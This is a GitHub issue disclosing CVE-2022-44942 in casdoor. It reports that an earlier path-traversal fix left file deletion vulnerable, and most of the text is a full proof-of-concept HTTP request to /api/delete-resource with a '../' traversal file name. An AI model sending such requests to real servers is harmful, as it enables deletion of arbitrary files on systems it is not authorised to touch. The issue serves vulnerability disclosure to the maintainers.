CVE-2022-44942: Arbitrary file delete vulnerability · Issue #1171 · casdoor/casdoor

Hi,

I was looking at the fix to #1035:

And I noticed it only fixes the path traversal in file upload, while file deletion is still vulnerable.
Thus, it’s possible to delete any file outside application’s webroot:

POC request:

POST /api/delete-resource?provider= HTTP/1.1
Host: localhost:8008
Content-Length: 363
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://localhost:8008
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8008/resources
Accept-Encoding: gzip, deflate
Accept-Language: en,pl-PL;q=0.9,pl;q=0.8,en-US;q=0.7
Cookie: casdoor_session_id=93862e25f31761d7cde831cdf4b93f14; Hm_lvt_5998fcd123c220efc0936edf4f250504=1664531159; Hm_lpvt_5998fcd123c220efc0936edf4f250504=1664531383
Connection: close

{"owner":"built-in","name":"/avatar/../../tmp/test.txt","createdTime":"2022-09-30T09:49:17Z","user":"admin","provider":"app-built-in","application":"app-built-in","tag":"avatar","parent":"CropperDiv","fileName":"admin.jpeg","fileType":"image","fileFormat":".jpeg","fileSize":159547,"url":"/files/avatar/built-in/admin.jpeg?t=1664531357206668083","description":""}